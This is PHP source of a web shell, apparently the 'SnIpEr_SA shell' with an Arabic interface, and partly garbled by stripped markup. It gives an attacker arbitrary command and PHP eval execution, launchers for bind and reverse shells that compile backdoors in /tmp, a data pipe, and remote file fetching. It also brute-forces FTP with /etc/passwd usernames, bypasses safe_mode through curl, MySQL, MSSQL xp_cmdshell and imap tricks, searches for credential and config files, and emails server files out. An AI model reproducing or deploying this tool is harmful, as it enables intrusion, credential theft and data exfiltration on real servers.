'eng_text6' =>'مسار ملفك', 'eng_text7' =>'اوامر جاهزه', 'eng_text8' =>'اختر الامر', 'eng_butt1' =>'تنفيذ', 'eng_butt2' =>'رفـع', 'eng_text9' =>'فتح بورت في السيرفر على /bin/bash', 'eng_text10'=>'بـورت', 'eng_text11'=>'باسورد للدخول', 'eng_butt3' =>'فتح', 'eng_text12'=>'أتصـال عـكسي', 'eng_text13'=>'الاي بي', 'eng_text14'=>'المنفذ', 'eng_butt4' =>'أتـصال', 'eng_text15'=>'سحب ملفات الى السيرفر', 'eng_text16'=>'عن طريق', 'eng_text17'=>'رابط الملف', 'eng_text18'=>'مكان نزوله', 'eng_text19'=>'Exploits', 'eng_text20'=>'إستخدم', 'eng_text21'=>' الاسم الجديد', 'eng_text22'=>'انبوب البيانات', 'eng_text23'=>'البورت المحلي', 'eng_text24'=>'السيرفر البعيد', 'eng_text25'=>'المنفذ البعيد', 'eng_text26'=>'استخدم', 'eng_butt5' =>'تشغيل', 'eng_text28'=>'العمل في الوضع الامن', 'eng_text29'=>'ممنوع الدخول', 'eng_butt6' =>'تغير', 'eng_text30'=>'عرض ملف', 'eng_butt7' =>'عرض', 'eng_text31'=>'الملف غير موجود', 'eng_text32'=>'تنفيذ كود php عن طريق داله eval', 'eng_text33'=>'Test bypass open_basedir with cURL functions', 'eng_butt8' =>'اختبار', 'eng_text34'=>'Test bypass safe_mode with include function', 'eng_text35'=>'Test bypass safe_mode with load file in mysql', 'eng_text36'=>'القاعدة . الجدول', 'eng_text37'=>'اسم المستخدم', 'eng_text38'=>'كلمة المرور', 'eng_text39'=>'القاعدة', 'eng_text40'=>'نسخة من جداول القاعدة', 'eng_butt9' =>'نسخة', 'eng_text41'=>'حفظ النسخة في', 'eng_text42'=>'تعديل الملفات', 'eng_text43'=>'الملف المراد تعديله', 'eng_butt10'=>'حفظ', 'eng_text44'=>'لاتستطيع التعديل على هذا الملف فقط تقرأ', 'eng_text45'=>'تم الحفظ', 'eng_text46'=>'عرض phpinfo()', 'eng_text47'=>'رؤية المتغيرات في php.ini', 'eng_text48'=>'مسح ملفات الـ temp', 'eng_butt11'=>'تحرير الملف', 'eng_text49'=>'مسح السكربت من السيرفر', 'eng_text50'=>'عرض معلومات الذاكرة الرئيسية', 'eng_text51'=>'عرض معلومات الذاكرة', 'eng_text52'=>'بحث نص', 'eng_text53'=>'في المسار', 'eng_text54'=>'بحث عن نص في الملفات', 'eng_butt12'=>'بحث', 'eng_text55'=>'فقط في الملفات', 'eng_text56'=>'لايوجد :(', 'eng_text57'=>'انشاء/مسح ملف/مجلد', 'eng_text58'=>'الاسم', 'eng_text59'=>'ملف', 'eng_text60'=>'مجلد', 'eng_butt13'=>'إنشاء /مسح', 'eng_text61'=>'تم إنشاء الملف', 'eng_text62'=>'تم إنشاء المجلد', 'eng_text63'=>'تم مسح الملف', 'eng_text64'=>'تم مسح المجلد', 'eng_text65'=>'إنشاء', 'eng_text66'=>'مسح', 'eng_text67'=>'التصريح/المستخدم/المجموعة', 'eng_text68'=>'امر', 'eng_text69'=>'إسم الملف', 'eng_text70'=>'التصريح', 'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", 'eng_text72'=>'النص المراد', 'eng_text73'=>'بحث في المجلدات', 'eng_text74'=>'بحث في الملفات', 'eng_text75'=>'* you can use regexp', 'eng_text76'=>'البحث عن نص في ملفات بواسطه find', 'eng_text80'=>'النوع', 'eng_text81'=>'الإتصالات', 'eng_text82'=>'قواعد البيانات', 'eng_text83'=>'تشغيل امر استعلام', 'eng_text84'=>'استعلام قاعدة', 'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server', 'eng_text86'=>'تنزيل ملفات من السيرفر', 'eng_butt14'=>'تحميل', 'eng_text87'=>'تنزيل ملفات من خادم الاف تي بي', 'eng_text88'=>'سيرفر الاف تي بي:المنفذ', 'eng_text89'=>'ملف في الاف تي بي', 'eng_text90'=>'التحويل الى', 'eng_text91'=>'ارشفة', 'eng_text92'=>'من غير الارشفة', 'eng_text93'=>'الاف تي بي', 'eng_text94'=>'تخمين الاف تي بي', 'eng_text95'=>'قائمة المستخدمين', 'eng_text96'=>'لم يستطع سحب قائمة المستخدمين', 'eng_text97'=>'تم الفحص: ', 'eng_text98'=>'تم بنجاح: ', 'eng_text99'=>'* استخدم اسماء المستخدمين في ملف /etc/passwd لدخول للـ ftp', 'eng_text100'=>'ارسال ملف الى خادم الاف تي بي', 'eng_text101'=>'استخدم الاسامي معكوسه لتخمينها', 'eng_text102'=>'خدمات البريد', 'eng_text103'=>'ارسال بريد', 'eng_text104'=>'ارسال ملف الى الايميل', 'eng_text105'=>'إلى', 'eng_text106'=>'مـن', 'eng_text107'=>'الموضوع', 'eng_butt15'=>'إرسال', 'eng_text108'=>'الرسالة', 'eng_text109'=>'مخفي', 'eng_text110'=>'عرض', 'eng_text111'=>'سيرفر قواعد البيانات : المنفذ', 'eng_text112'=>'قرائة الملفات عن طريق ثغرة داله mb_send_mail', 'eng_text113'=>'قرائة محتوى المجلدات عن طريق via imap_list', 'eng_text114'=>'قرائة الملفات عن طريق ثغرة via imap_body', 'eng_text115'=>'قرائة الملفات عن طريق compress.zlib://', 'eng_text116'=>'نسخ من', 'eng_text117'=>'الى', 'eng_text118'=>'تم نسخ الملف', 'eng_text119'=>'لايستطيع النسخ', 'eng_err0'=>'خطاء ! لايمكن الكتابة على هذا الملف ', 'eng_err1'=>'خطاء ! غير قادر على قرائه هذا الملف ', 'eng_err2'=>'خطاء! لايمكن الانشاء ', 'eng_err3'=>'خطاء! غير قادر على الاتصال بالاف تي بي', 'eng_err4'=>'خطاء ! لاتستطيع الدخول الى سيرفر الاف تي بي', 'eng_err5'=>'خطاء ! لاتستطيع تغير المجلد في الاف تي بي', 'eng_err6'=>'خطاء ! لاتستطيع ارسال رساله', 'eng_err7'=>'البريد ارسل', 'eng_text200'=>'قرائة الملفات عن طريق ثغرة copy()', 'eng_text202'=>'مسار الملف المراد قرائته', 'eng_text300'=>'قرائه الملفات عن طريق ثغرة curl()', 'eng_text302'=>'مسار الملف المراد قرائته', ); /* ?????? ?????? ????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) ?? ?????? ???? ????????? ??? ???????? ???????.

• /

$aliases=array( 'البحث عن ملفات suid'=>'find / -type f -perm -04000 -ls', 'البحث عن ملفات suid في المجلد الحالي'=>'find . -type f -perm -04000 -ls', 'البحث عن ملفات suid'=>'find / -type f -perm -02000 -ls', 'البحث عن ملفات suid في المجلد الحالي'=>'find . -type f -perm -02000 -ls', 'البحث عن ملفات config.inc.php'=>'find / -type f -name config.inc.php', 'البحث عن ملفات config.inc.php في المجلد الحالي'=>'find . -type f -name config.inc.php', 'البحث عن ملفات config* بجميع الامتدادات'=>'find / -type f -name "config*"', 'البحث عن ملفات config* في المجلد الحالي'=>'find . -type f -name "config*"', 'البحث عن الملفات القابلة للكتابة'=>'find / -type f -perm -2 -ls', 'البحث عن الملفات القابلة للكتابة في المجلد الحالي'=>'find . -type f -perm -2 -ls', 'البحث عن المجلدات القابلة للكتابة'=>'find / -type d -perm -2 -ls', 'البحث عن المجلدات القابلة للكتابة في المسار الحالي'=>'find . -type d -perm -2 -ls', 'البحث عن ملفات ومجلدات قابلة للكتابة'=>'find / -perm -2 -ls', 'البحث عن ملفات ومجلدات في المسار الحالي'=>'find . -perm -2 -ls', 'البحث عن ملفات service.pwd'=>'find / -type f -name service.pwd', 'البحث عن ملفات service.pwd في المسار الحالي'=>'find . -type f -name service.pwd', 'البحث عن كل ملفات الجدران النارية .htpasswd'=>'find / -type f -name .htpasswd', 'البحث عن جميع ملفات الجدران النارية في المسار الحالي'=>'find . -type f -name .htpasswd', 'البحث عن جميع ملفات .bash_history'=>'find / -type f -name .bash_history', 'البحث عن جميع ملفات .bash_history في المسار الحالي'=>'find . -type f -name .bash_history', 'البحث عن جميع ملفات .mysql_history'=>'find / -type f -name .mysql_history', 'البحث عن جميع ملفات .mysql_history في المسار الحالي'=>'find . -type f -name .mysql_history', 'البحث عن جميع ملفات .fetchmailrc'=>'find / -type f -name .fetchmailrc', 'البحث عن جميع ملفات .fetchmailrc في المسار الحالي'=>'find . -type f -name .fetchmailrc', 'اخر ملفات مشغله في النظام'=>'lsattr -va', 'رؤية البورتات المفتوحة في السيرفر'=>'netstat -an | grep -i listen', 'رؤية حالة المجلدات وامكانية التنفيذ'=>'cat /etc/fstab', 'مشاهدة ملف اللوق لدخول السي بانل والمواقع على السيرفر'=>'cat /var/cpanel/accounting.log', '----------------------------------------------------------------------------------------------------'=>'ls -la' );

$table_up1 = "

"; $table_up3 = "

";

{

if(!$users=get_users()) { echo "

"; }

else
 {

echo '

 foreach($users as $user) { echo $user."
"; }

';

 }

echo "

"; die();

}

{
$os = getenv('OS');
if(empty($os)){ $os = php_uname(); }
if(empty($os)){ $os ="-"; $unix=1; }
else
   {
   if(@eregi("^win",$os)) { $unix = 0; }
   else { $unix = 1; }
   }
}

 {
   echo $head;
   if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
   else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
   $sr->SearchText(0,0);
   $res = $sr->GetResultFiles();
   $found = $sr->GetMatchesCount();
   $titles = $sr->GetTitles();
   $r = "";
   if($found > 0)
   {

$r .= "

       $r .= (!$unix)? str_replace("/","\\",$file) : $file;
       $r .= "</ TD>";

";

   echo $r;
   }
   else
   {

echo "

";

   }

echo "

";

 die();
 }

$res = ;
if (!empty($cfe))
{
 if(function_exists('exec'))
  {
   @exec($cfe,$res);
   $res = join("\n",$res);
  }
 elseif(function_exists('shell_exec'))
  {
   $res = @shell_exec($cfe);
  }
 elseif(function_exists('system'))
  {
   @ob_start();
   @system($cfe);
   $res = @ob_get_contents();
   @ob_end_clean();
  }
 elseif(function_exists('passthru'))
  {
   @ob_start();
   @passthru($cfe);
   $res = @ob_get_contents();
   @ob_end_clean();
  }
 elseif(@is_resource($f = @popen($cfe,"r")))
 {
  $res = "";
  while(!@feof($f)) { $res .= @fread($f,1024); }
  @pclose($f);
 }
}
return $res;

 $users = array();
 $rows=file('/etc/passwd');
 if(!$rows) return 0;
 foreach ($rows as $string)
  {
          $user = @explode(":",$string);
          if(substr($string,0,1)!='#') array_push($users,$user[0]);
  }
 return $users;

echo '

';

$ret = "<input type=".$type." name=".$name." ";
if($size != 0) { $ret .= "size=".$size." "; }
$ret .= "value=\"".$value."\"";
if($checked) $ret .= " checked";
return $ret.">";

$w_file=@fopen($fname,"w") or err(0);
if($w_file)
{
@fputs($w_file,@base64_decode($text));
@fclose($w_file);
}

{

return "".$t1."".$t2."";

}

if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;

 function DirFilesR($dir,$types=)
 {
   $files = Array();
   if(($handle = @opendir($dir)))
   {
     while (false !== ($file = @readdir($handle)))
     {
       if ($file != "." && $file != "..")
       {
         if(@is_dir($dir."/".$file))
           $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
         else
         {
           $pos = @strrpos($file,".");
           $ext = @substr($file,$pos,@strlen($file)-$pos);
           if($types)
           {
             if(@in_array($ext,explode(';',$types)))
               $files[] = $dir."/".$file;
           }
           else
             $files[] = $dir."/".$file;
         }
       }
     }
     @closedir($handle);
   }
   return $files;
 }
 class SearchResult
 {
   var $text;
   var $FilesToSearch;
   var $ResultFiles;
   var $FilesTotal;
   var $MatchesCount;
   var $FileMatschesCount;
   var $TimeStart;
   var $TimeTotal;
   var $titles;
   function SearchResult($dir,$text,$filter=)
   {
     $dirs = @explode(";",$dir);
     $this->FilesToSearch = Array();
     for($a=0;$a<count($dirs);$a++)
       $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
     $this->text = $text;
     $this->FilesTotal = @count($this->FilesToSearch);
     $this->TimeStart = getmicrotime();
     $this->MatchesCount = 0;
     $this->ResultFiles = Array();
     $this->FileMatchesCount = Array();
     $this->titles = Array();
   }
   function GetFilesTotal() { return $this->FilesTotal; }
   function GetTitles() { return $this->titles; }
   function GetTimeTotal() { return $this->TimeTotal; }
   function GetMatchesCount() { return $this->MatchesCount; }
   function GetFileMatchesCount() { return $this->FileMatchesCount; }
   function GetResultFiles() { return $this->ResultFiles; }
   function SearchText($phrase=0,$case=0) {
   $qq = @explode(' ',$this->text);
   $delim = '|';
     if($phrase)
       foreach($qq as $k=>$v)
         $qq[$k] = '\b'.$v.'\b';
     $words = '('.@implode($delim,$qq).')';
     $pattern = "/".$words."/";
     if(!$case)
       $pattern .= 'i';
     foreach($this->FilesToSearch as $k=>$filename)
     {
       $this->FileMatchesCount[$filename] = 0;
       $FileStrings = @file($filename) or @next;
       for($a=0;$a<@count($FileStrings);$a++)
       {
         $count = 0;
         $CurString = $FileStrings[$a];
         $CurString = @Trim($CurString);
         $CurString = @strip_tags($CurString);
         $aa = ;
         if(($count = @preg_match_all($pattern,$CurString,$aa)))
         {
           $CurString = @preg_replace($pattern,"\\1",$CurString);
           $this->ResultFiles[$filename][$a+1] = $CurString;
           $this->MatchesCount += $count;
           $this->FileMatchesCount[$filename] += $count;
         }
       }
     }
     $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
   }
 }
 function getmicrotime()
 {
   list($usec,$sec) = @explode(" ",@microtime());
   return ((float)$usec + (float)$sec);
 }

{
if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
if($safe_mode) { $sysctl = '-'; }
else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
else
 {
  $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
  if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
  if(empty($sysctl)) { $sysctl = '-'; }
  setcookie('sysctl',$sysctl);
 }
}

echo '<body>

{
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\">cpu</a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\">mem</a> ".$rb;
echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\">users</a> ".$rb;
}

{
$euserinfo  = @posix_getpwuid(@posix_geteuid());
$egroupinfo = @posix_getgrgid(@posix_getegid());
echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )
';
}

";

{
$res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
err(6+$res);
$_POST['cmd']="";
}

{
if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
else
 {
   $filename = @basename($_POST['loc_file']);
   $filedump = @fread($file,@filesize($_POST['loc_file']));
   fclose($file);
   $content_encoding=$mime_type=;
   compress($filename,$filedump,$_POST['compress']);
   $attach = array(
                   "name"=>$filename,
                   "type"=>$mime_type,
                   "content"=>$filedump
                  );
   if(empty($_POST['subj'])) { $_POST['subj'] = 'file from SnIpEr_SA shell'; }
   if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
   $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
   err(6+$res);
   $_POST['cmd']="";
 }
}

{
switch($_POST['what'])
  {
  case 'own':
  @chown($_POST['param1'],$_POST['param2']);
  break;
  case 'grp':
  @chgrp($_POST['param1'],$_POST['param2']);
  break;
  case 'mod':
  @chmod($_POST['param1'],intval($_POST['param2'], 8));
  break;
  }
$_POST['cmd']="";
}

{
  switch($_POST['what'])
  {
    case 'file':
     if($_POST['action'] == "create")
      {
      if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
      else {
       fclose($file);
       $_POST['e_name'] = $_POST['mk_name'];
       $_POST['cmd']="edit_file";

echo "

";

       }
      }
      else if($_POST['action'] == "delete")
      {

if(unlink($_POST['mk_name'])) echo "

";

      $_POST['cmd']="";
      }
    break;
    case 'dir':
     if($_POST['action'] == "create"){
     if(mkdir($_POST['mk_name']))
      {
        $_POST['cmd']="";

echo "

";

      }
     else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
     }
     else if($_POST['action'] == "delete"){

if(rmdir($_POST['mk_name'])) echo "

";

     $_POST['cmd']="";
     }
    break;
  }
}

{
if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
else {
echo $table_up3;
echo $font;
echo "<form name=save_file method=post>";
echo ws(3)."".$_POST['e_name']."";

echo "

echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
fclose($file);
echo "</textarea>";
echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
echo "<input type=hidden name=dir value=".$dir.">";
echo "<input type=hidden name=cmd value=save_file>";
echo (!empty($only_read)?("

".$lang[$language.'_text44']):("

<input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));

";

echo "";
echo "</form>";

echo "";

exit();
}
}

if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")

{
$mtime = @filemtime($_POST['e_name']);
if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
else {
if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
@fwrite($file,$_POST['e_text']);
@touch($_POST['e_name'],$mtime,$mtime);
$_POST['cmd']="";

echo "

";

}
}

if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) {

cf("/tmp/bd.c",$port_bind_bd_c);
$blah = ex("gcc -o /tmp/bd /tmp/bd.c");
@unlink("/tmp/bd.c");
$blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
$_POST['cmd']="ps -aux | grep bd";

} if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) {

cf("/tmp/bdpl",$port_bind_bd_pl);
$p2=which("perl");
$blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
$_POST['cmd']="ps -aux | grep bdpl";

} if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) {

cf("/tmp/back",$back_connect);
$p2=which("perl");
$blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";

} if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) {

cf("/tmp/back.c",$back_connect_c);
$blah = ex("gcc -o /tmp/backc /tmp/back.c");
@unlink("/tmp/back.c");
$blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";

} if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) {

cf("/tmp/dp",$datapipe_pl);
$p2=which("perl");
$blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
$_POST['cmd']="ps -aux | grep dp";

} if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) {

cf("/tmp/dpc.c",$datapipe_c);
$blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
@unlink("/tmp/dpc.c");
$blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
$_POST['cmd']="ps -aux | grep dpc";

} if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; } if (!empty($HTTP_POST_FILES['userfile']['name'])) { if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } else { $nfn = $HTTP_POST_FILES['userfile']['name']; } @copy($HTTP_POST_FILES['userfile']['tmp_name'],

           $_POST['dir']."/".$nfn)

or print("

");

} if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) {

switch($_POST['with'])
{
case wget:
$_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
break;
case fetch:
$_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
break;
case lynx:
$_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
break;
case links:
$_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
break;
case GET:
$_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
break;
case curl:
$_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
break;
}

} if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))

{
list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
if(empty($ftp_port)) { $ftp_port = 21; }
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
if(!$connection) { err(3); }
else
 {
 if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
 else
  {
  if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);        }
  if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);        }
  }
 }
@ftp_close($connection);
$_POST['cmd'] = "";
}

if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")

{
list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
if(empty($ftp_port)) { $ftp_port = 21; }
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
if(!$connection) { err(3); $_POST['cmd'] = ""; }

else if(!$users=get_users()) { echo "

"; $_POST['cmd'] = ""; }

@ftp_close($connection);
}

echo $table_up3; if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); } else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }

echo $font.$lang[$language.'_text1'].": ".$_POST['cmd']."

switch($_POST['cmd'])
{
case 'safe_dir':
 $d=@dir($dir);
 if ($d)
  {
  while (false!==($file=$d->read()))
   {
    if ($file=="." || $file=="..") continue;
    @clearstatcache();
    list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
    if(!$unix){
    echo date("d.m.Y H:i",$mtime);
    if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
    }
    else{
    $owner = @posix_getpwuid($uid);
    $grgid = @posix_getgrgid($gid);
    echo $inode." ";
    echo perms(@fileperms($file));
    printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
    echo date("d.m.Y H:i ",$mtime);
    }
    echo "$file\n";
   }
  $d->close();
  }
 else echo $lang[$language._text29];
break;
 case 'test1':
 $ci = @curl_init("file://".$_POST['test1_file']."");
 $cf = @curl_exec($ci);
 echo $cf;
 break;
 case 'test2':
 @include($_POST['test2_file']);
 break;
 case 'test3':
 if(empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; }
 $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']);
 if($db)
  {
  if(@mysql_select_db($_POST['test3_md'],$db))
   {
    @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table");
    @mysql_query("CREATE TABLE `temp_SnIpEr_SA_table` ( `file` LONGBLOB NOT NULL )");
    @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
    $r = @mysql_query("SELECT * FROM temp_SnIpEr_SA_table");
    while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
    @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table");
   }
   else echo "[-] ERROR! Can't select database";
  @mysql_close($db);
  }
 else echo "[-] ERROR! Can't connect to mysql server";
 break;
 case 'test4':
 if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
 $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
 if($db)
  {
  if(@mssql_select_db($_POST['test4_md'],$db))
   {
    @mssql_query("drop table SnIpEr_SA_temp_table",$db);
    @mssql_query("create table SnIpEr_SA_temp_table ( string VARCHAR (500) NULL)",$db);
    @mssql_query("insert into SnIpEr_SA_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
    $res = mssql_query("select * from SnIpEr_SA_temp_table",$db);
    while(($row=@mssql_fetch_row($res)))
     {
     echo $row[0]."\r\n";
     }
   @mssql_query("drop table SnIpEr_SA_temp_table",$db);
   }
   else echo "[-] ERROR! Can't select database";
  @mssql_close($db);
  }
 else echo "[-] ERROR! Can't connect to MSSQL server";
 break;
 case 'test5':
 if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
 $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
 @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
 $lines = file ('/tmp/mb_send_mail');
 foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
 break;
 case 'test6':
 $stream = @imap_open('/etc/passwd', "", "");
 $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
 for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
 @imap_close($stream);
 break;
 case 'test7':
 $stream = @imap_open($_POST['test7_file'], "", "");
 $str = @imap_body($stream, 1);
 echo $str;
 @imap_close($stream);
 break;
 case 'test8':
 if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
 else echo $lang[$language.'_text119'];
 break;
}

$cmd_rep = ex($_POST['cmd']);
if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
else { echo @htmlspecialchars($cmd_rep)."\n"; }}

{
$suc = 0;
foreach($users as $user)
 {
 $connection = @ftp_connect($ftp_server,$ftp_port,10);
 if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
 else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
 @ftp_close($connection);
 }
echo "\r\n-------------------------------------\r\n";
$count = count($users);
if(isset($_POST['reverse'])) { $count *= 2; }
echo $lang[$language.'_text97'].$count."\r\n";
echo $lang[$language.'_text98'].$suc."\r\n";
}

$eval = @str_replace("<?","",$_POST['php_eval']);
$eval = @str_replace("?>","",$eval);
@eval($eval);}

{
 if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
 $sql = new my_sql();
 $sql->db   = $_POST['db'];
 $sql->host = $_POST['db_server'];
 $sql->port = $_POST['db_port'];
 $sql->user = $_POST['mysql_l'];
 $sql->pass = $_POST['mysql_p'];
 $sql->base = $_POST['mysql_db'];
 if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
 else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
 else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
 else {
  if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
  else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
  else { echo "[-] ERROR! Can't write in dump file"; }
  }
}

";

echo "";

echo ""; echo "

}

} echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts; echo sr(15,"".$lang[$language.'_text43'].$arrow."",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));

echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id3').$table_up2.div('id3').$ts; echo sr(15,"".$lang[$language.'_text202'].$arrow."",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));

echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id3').$table_up2.div('id3').$ts; echo sr(15,"".$lang[$language.'_text302'].$arrow."",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));

